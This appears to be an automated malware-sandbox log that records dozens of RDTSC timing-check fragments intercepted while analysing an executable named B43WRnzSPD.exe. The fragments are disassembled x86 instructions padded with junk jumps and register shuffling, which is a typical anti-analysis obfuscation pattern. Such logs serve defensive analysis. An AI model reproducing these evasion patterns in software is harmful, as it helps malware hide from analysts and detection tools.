Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B035A second address: 73B03BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007F262CBE4E93h 0x0000000b and ah, 0000006Eh 0x0000000e jmp 00007F262CBE4E99h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov esi, eax 0x00000019 jmp 00007F262CBE4E8Eh 0x0000001e test esi, esi 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F262CBE4E97h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B03BE second address: 73B045A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F269B55EDD3h 0x0000000f jmp 00007F262D38FB0Eh 0x00000014 sub eax, eax 0x00000016 pushad 0x00000017 mov eax, edi 0x00000019 jmp 00007F262D38FB13h 0x0000001e popad 0x0000001f mov dword ptr [esi], edi 0x00000021 pushad 0x00000022 movzx ecx, di 0x00000025 pushfd 0x00000026 jmp 00007F262D38FB11h 0x0000002b adc ax, E276h 0x00000030 jmp 00007F262D38FB11h 0x00000035 popfd 0x00000036 popad 0x00000037 mov dword ptr [esi+04h], eax 0x0000003a jmp 00007F262D38FB0Eh 0x0000003f mov dword ptr [esi+08h], eax 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F262D38FB0Ah 0x0000004b rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B045A second address: 73B0460 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0460 second address: 73B04A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+0Ch], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F262D38FB0Dh 0x00000015 sbb ecx, 3B8917E6h 0x0000001b jmp 00007F262D38FB11h 0x00000020 popfd 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B04A0 second address: 73B04A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B04A5 second address: 73B04E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+4Ch] 0x0000000c jmp 00007F262D38FB16h 0x00000011 mov dword ptr [esi+10h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push edx 0x00000018 pop eax 0x00000019 mov edx, 6CC5AE2Ch 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B04E7 second address: 73B04ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B04ED second address: 73B052C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+50h] 0x0000000b jmp 00007F262D38FB18h 0x00000010 mov dword ptr [esi+14h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F262D38FB17h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B052C second address: 73B0544 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F262CBE4E94h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0544 second address: 73B05B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+54h] 0x0000000e jmp 00007F262D38FB16h 0x00000013 mov dword ptr [esi+18h], eax 0x00000016 pushad 0x00000017 mov dl, cl 0x00000019 pushfd 0x0000001a jmp 00007F262D38FB13h 0x0000001f add si, 32AEh 0x00000024 jmp 00007F262D38FB19h 0x00000029 popfd 0x0000002a popad 0x0000002b mov eax, dword ptr [ebx+58h] 0x0000002e pushad 0x0000002f mov eax, 13D793D3h 0x00000034 push ecx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B05B4 second address: 73B05F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov dword ptr [esi+1Ch], eax 0x00000009 pushad 0x0000000a mov ecx, 0F533C7Dh 0x0000000f pushad 0x00000010 movzx ecx, dx 0x00000013 jmp 00007F262CBE4E95h 0x00000018 popad 0x00000019 popad 0x0000001a mov eax, dword ptr [ebx+5Ch] 0x0000001d jmp 00007F262CBE4E8Eh 0x00000022 mov dword ptr [esi+20h], eax 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B05F8 second address: 73B05FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B05FC second address: 73B0600 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0600 second address: 73B0606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0606 second address: 73B062F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E94h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+60h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F262CBE4E8Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B062F second address: 73B0633 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0633 second address: 73B0639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0639 second address: 73B0660 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+24h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F262D38FB17h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0660 second address: 73B067D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B067D second address: 73B068D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F262D38FB0Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B068D second address: 73B06A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+64h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B06A7 second address: 73B06AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B06AD second address: 73B06B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B06B3 second address: 73B06B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B06B7 second address: 73B06BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B06BB second address: 73B0705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+28h], eax 0x0000000b jmp 00007F262D38FB10h 0x00000010 mov eax, dword ptr [ebx+68h] 0x00000013 pushad 0x00000014 mov edx, ecx 0x00000016 pushfd 0x00000017 jmp 00007F262D38FB0Ah 0x0000001c or eax, 4C5C07F8h 0x00000022 jmp 00007F262D38FB0Bh 0x00000027 popfd 0x00000028 popad 0x00000029 mov dword ptr [esi+2Ch], eax 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f mov eax, 1A2FE441h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0705 second address: 73B07D4 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007F262CBE4E93h 0x0000000d sbb ax, E86Eh 0x00000012 jmp 00007F262CBE4E99h 0x00000017 popfd 0x00000018 popad 0x00000019 mov ax, word ptr [ebx+6Ch] 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F262CBE4E8Ch 0x00000024 jmp 00007F262CBE4E95h 0x00000029 popfd 0x0000002a mov dl, ch 0x0000002c popad 0x0000002d mov word ptr [esi+30h], ax 0x00000031 jmp 00007F262CBE4E93h 0x00000036 mov ax, word ptr [ebx+00000088h] 0x0000003d pushad 0x0000003e pushfd 0x0000003f jmp 00007F262CBE4E8Bh 0x00000044 sub ax, 608Eh 0x00000049 jmp 00007F262CBE4E99h 0x0000004e popfd 0x0000004f popad 0x00000050 mov word ptr [esi+32h], ax 0x00000054 jmp 00007F262CBE4E8Eh 0x00000059 mov eax, dword ptr [ebx+0000008Ch] 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 popad 0x00000065 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B07D4 second address: 73B07DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B07DA second address: 73B07FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E94h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+34h], eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov bx, 23FEh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B07FC second address: 73B08AD instructions: 0x00000000 rdtsc 0x00000002 call 00007F262D38FB0Fh 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [ebx+18h] 0x0000000e jmp 00007F262D38FB0Fh 0x00000013 mov dword ptr [esi+38h], eax 0x00000016 jmp 00007F262D38FB16h 0x0000001b mov eax, dword ptr [ebx+1Ch] 0x0000001e jmp 00007F262D38FB10h 0x00000023 mov dword ptr [esi+3Ch], eax 0x00000026 jmp 00007F262D38FB10h 0x0000002b mov eax, dword ptr [ebx+20h] 0x0000002e jmp 00007F262D38FB10h 0x00000033 mov dword ptr [esi+40h], eax 0x00000036 pushad 0x00000037 mov ebx, esi 0x00000039 popad 0x0000003a lea eax, dword ptr [ebx+00000080h] 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 pushad 0x00000044 popad 0x00000045 pushfd 0x00000046 jmp 00007F262D38FB0Eh 0x0000004b jmp 00007F262D38FB15h 0x00000050 popfd 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B08AD second address: 73B08D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000001h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F262CBE4E8Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B08D3 second address: 73B08EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d movzx esi, bx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B08EF second address: 73B0926 instructions: 0x00000000 rdtsc 0x00000002 mov al, dh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ecx, 35917387h 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007F262CBE4E8Dh 0x00000012 nop 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F262CBE4E98h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0926 second address: 73B092A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B092A second address: 73B0930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0930 second address: 73B0963 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c pushad 0x0000000d mov esi, 4D60009Dh 0x00000012 movzx eax, di 0x00000015 popad 0x00000016 push ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F262D38FB11h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0963 second address: 73B0980 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0980 second address: 73B0988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, dx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0988 second address: 73B098E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B09A2 second address: 73B09A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B09A8 second address: 73B0A1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F262CBE4E8Ah 0x00000009 and si, 19E8h 0x0000000e jmp 00007F262CBE4E8Bh 0x00000013 popfd 0x00000014 call 00007F262CBE4E98h 0x00000019 pop ecx 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov edi, eax 0x0000001f pushad 0x00000020 mov di, 2692h 0x00000024 mov bx, 19DEh 0x00000028 popad 0x00000029 test edi, edi 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e pushfd 0x0000002f jmp 00007F262CBE4E91h 0x00000034 add esi, 5F520966h 0x0000003a jmp 00007F262CBE4E91h 0x0000003f popfd 0x00000040 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0A1E second address: 73B0A33 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ah, bh 0x00000009 popad 0x0000000a js 00007F269B55E7A1h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0A33 second address: 73B0A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F262CBE4E97h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0A4F second address: 73B0A92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 1F75D381h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp-0Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov si, bx 0x00000014 pushfd 0x00000015 jmp 00007F262D38FB15h 0x0000001a adc eax, 3B9B1586h 0x00000020 jmp 00007F262D38FB11h 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0A92 second address: 73B0ABB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 movsx edx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+04h], eax 0x0000000e jmp 00007F262CBE4E92h 0x00000013 lea eax, dword ptr [ebx+78h] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0ABB second address: 73B0ABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0ABF second address: 73B0ADC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0ADC second address: 73B0AE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0AE1 second address: 73B0B1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F262CBE4E8Dh 0x0000000a sub esi, 6825D1A6h 0x00000010 jmp 00007F262CBE4E91h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push 00000001h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F262CBE4E8Dh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0B1F second address: 73B0B6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F262D38FB0Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F262D38FB0Ch 0x00000019 jmp 00007F262D38FB15h 0x0000001e popfd 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0B6D second address: 73B0B9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F262CBE4E90h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73A0928 second address: 73A092C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73A092C second address: 73A0932 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7390A69 second address: 7390A6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7390A6D second address: 7390A8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, 29987645h 0x0000000b popad 0x0000000c xchg eax, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F262CBE4E8Dh 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73A0B6A second address: 73A0BB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+04h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F262D38FB14h 0x00000013 adc ax, 97C8h 0x00000018 jmp 00007F262D38FB0Bh 0x0000001d popfd 0x0000001e mov ecx, 1390093Fh 0x00000023 popad 0x00000024 push dword ptr [ebp+0Ch] 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a mov ecx, ebx 0x0000002c mov si, di 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 74109F8 second address: 74109FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 74109FC second address: 7410A02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7410A02 second address: 7410A17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F262CBE4E91h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7410A17 second address: 7410A1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7410A1B second address: 7410A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 jmp 00007F262CBE4E8Ah 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F262CBE4E97h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7410A4A second address: 7410A6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7410A6F second address: 7410A75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7410A75 second address: 7410AA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dl, byte ptr [ebp+14h] 0x0000000c pushad 0x0000000d jmp 00007F262D38FB0Eh 0x00000012 popad 0x00000013 mov eax, dword ptr [ebp+10h] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7410AA7 second address: 7410AAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7410AAB second address: 7410AAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7410AAF second address: 7410AB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7410AB5 second address: 7410ABB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7410ABB second address: 7410B45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dl, 00000007h 0x0000000b jmp 00007F262CBE4E99h 0x00000010 test eax, eax 0x00000012 jmp 00007F262CBE4E8Eh 0x00000017 je 00007F269CC2A589h 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F262CBE4E8Eh 0x00000024 xor ch, FFFFFFA8h 0x00000027 jmp 00007F262CBE4E8Bh 0x0000002c popfd 0x0000002d mov cx, 869Fh 0x00000031 popad 0x00000032 sub ecx, ecx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007F262CBE4E8Ch 0x0000003d jmp 00007F262CBE4E95h 0x00000042 popfd 0x00000043 movzx eax, di 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7410B45 second address: 7410B4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7400494 second address: 74004AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
